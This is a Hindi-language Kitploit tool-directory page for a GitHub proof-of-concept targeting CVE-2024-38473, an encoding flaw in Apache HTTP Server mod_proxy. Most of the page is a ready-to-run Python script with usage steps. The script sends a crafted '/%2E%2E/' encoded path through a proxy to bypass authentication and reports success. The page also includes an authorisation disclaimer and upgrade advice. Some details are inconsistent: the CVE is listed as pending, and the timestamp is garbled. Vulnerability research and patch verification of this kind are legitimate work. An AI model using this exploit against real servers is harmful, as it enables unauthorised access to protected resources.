Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-38473 — Apache HTTP सर्वर mod_proxy में एन्कोडिंग दोष का प्रदर्शन करने वाला प्रूफ-ऑफ-कॉन्सेप्ट जो तैयार किए गए एन्कोडेड URL के माध्यम से प्रमाणीकरण को बायपास कर सकता है। | Kitploit
उपकरण/GitHubGitHub/abdurahmon3236/cve-2024-38473
प्रमाणीकरण और प्राधिकरणभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubabdurahmon3236/cve-2024-38473

CVE-2024-38473

Apache HTTP सर्वर mod_proxy में एन्कोडिंग दोष का प्रदर्शन करने वाला प्रूफ-ऑफ-कॉन्सेप्ट जो तैयार किए गए एन्कोडेड URL के माध्यम से प्रमाणीकरण को बायपास कर सकता है।

रिपॉजिटरी देखें
3242 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

mod_proxy में एन्कोडिंग समस्या के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) (Apache HTTP Server में)

इस रिपॉजिटरी में Apache HTTP Server संस्करण 2.4.59 और उससे पहले के mod_proxy मॉड्यूल में एक एन्कोडिंग समस्या प्रदर्शित करने के लिए प्रूफ ऑफ कॉन्सेप्ट (PoC) स्क्रिप्ट्स शामिल हैं। यह कमजोरी अनुरोध URL को गलत एन्कोडिंग के साथ बैकएंड सेवाओं को भेजने की अनुमति देती है, संभावित रूप से क्राफ्टेड अनुरोधों के माध्यम से प्रमाणीकरण को बायपास करती है।

विषय सूची

  • कमजोरी का विवरण
  • सेटअप और उपयोग
  • महत्वपूर्ण विचार
  • शमन

कमजोरी का विवरण

CVE-ID: (लंबित)

अवलोकन: Apache HTTP Server संस्करण 2.4.59 और उससे पहले के mod_proxy मॉड्यूल में एक एन्कोडिंग समस्या अनुरोध URL को गलत एन्कोडिंग के साथ बैकएंड सेवाओं को भेजने की अनुमति देती है। यह संभावित रूप से क्राफ्टेड अनुरोधों के माध्यम से प्रमाणीकरण तंत्र को बायपास कर सकता है। उपयोगकर्ताओं को संस्करण 2.4.60 में अपग्रेड करने की अनुशंसा की जाती है, जो इस समस्या को ठीक करता है।

प्रभावित संस्करण:

  • Apache HTTP Server 2.4.59 और उससे पहले

निश्चित संस्करण:

  • Apache HTTP Server 2.4.60

सेटअप और उपयोग

आवश्यक शर्तें

  • Python 3.x
  • requests लाइब्रेरी (pip install requests)

कमजोरी का प्रदर्शन

  1. बैकएंड सेवा की पहचान करें:

    • मान लें कि बैकएंड सेवा http://backend-service.example.com पर स्थित है।
  2. एक दुर्भावनापूर्ण अनुरोध तैयार करें:

    • दुर्भावनापूर्ण अनुरोध प्रमाणीकरण को बायपास करने के लिए गलत एन्कोडिंग का उपयोग करेगा।
  3. PoC स्क्रिप्ट चलाएं:

    • निम्नलिखित स्क्रिप्ट को mod_proxy_poc.py के रूप में सहेजें और इसे चलाएं।

PoC स्क्रिप्ट

यहां एक Python स्क्रिप्ट है जो कमजोरी को प्रदर्शित करती है:

root@kitploit:~
import requests

# Configuration
proxy_url = "http://proxy-server.example.com"  # Change this to the proxy server's URL
backend_service_path = "/protected/resource"  # The path to the protected resource on the backend service
malicious_path = "/%2E%2E/protected/resource"  # Incorrectly encoded path to bypass authentication

# Malicious request to be sent via the proxy server
malicious_url = f"{proxy_url}{malicious_path}"

def send_malicious_request():
    try:
        # Send the crafted request to the proxy server
        response = requests.get(malicious_url)
        
        # Print the response details
        print("Status Code:", response.status_code)
        print("Response Headers:", response.headers)
        print("Response Body:", response.text)
        
        if response.status_code == 200:
            print("[+] Successfully bypassed authentication and accessed the protected resource.")
        else:
            print("[-] Failed to bypass authentication.")
    except Exception as e:
        print("[-] An error occurred:", str(e))

if __name__ == "__main__":
    send_malicious_request()

स्पष्टीकरण

  1. कॉन्फ़िगरेशन:

    • proxy_url: प्रॉक्सी सर्वर का URL.
    • backend_service_path: बैकएंड सेवा पर संरक्षित संसाधन का पथ.
    • malicious_path: प्रमाणीकरण को बायपास करने के लिए गलत एन्कोडेड पथ.
  2. send_malicious_request:

    • गलत एन्कोडेड पथ के साथ एक दुर्भावनापूर्ण URL बनाता है।
    • दुर्भावनापूर्ण URL के साथ प्रॉक्सी सर्वर को GET अनुरोध भेजता है।
    • यह जांचने के लिए प्रतिक्रिया विवरण प्रिंट करता है कि प्रमाणीकरण बायपास हुआ या नहीं।

महत्वपूर्ण विचार

  • अनुमतियाँ: सुनिश्चित करें कि आपके पास लक्ष्य प्रणाली पर इस कमजोरी का परीक्षण करने की स्पष्ट अनुमति है। अनधिकृत पहुंच अवैध और अनैतिक है।
  • परीक्षण वातावरण: उत्पादन प्रणालियों को प्रभावित करने से बचने के लिए इस परीक्षण को नियंत्रित वातावरण में करें।

शमन

इस कमजोरी को कम करने के लिए, Apache HTTP Server संस्करण 2.4.60 में अपग्रेड करें, जो mod_proxy मॉड्यूल में एन्कोडिंग समस्या को ठीक करता है।

  • अपग्रेड निर्देश:
    • नवीनतम संस्करण डाउनलोड और इंस्टॉल करने के लिए आधिकारिक Apache HTTP Server दस्तावेज़ीकरण का पालन करें।

अपने सॉफ़्टवेयर को अद्यतित रखकर और सुरक्षा सर्वोत्तम प्रथाओं का पालन करके, आप mod_proxy मॉड्यूल में इस एन्कोडिंग समस्या जैसी कमजोरियों को रोक सकते हैं।

टूल डाउनलोड करें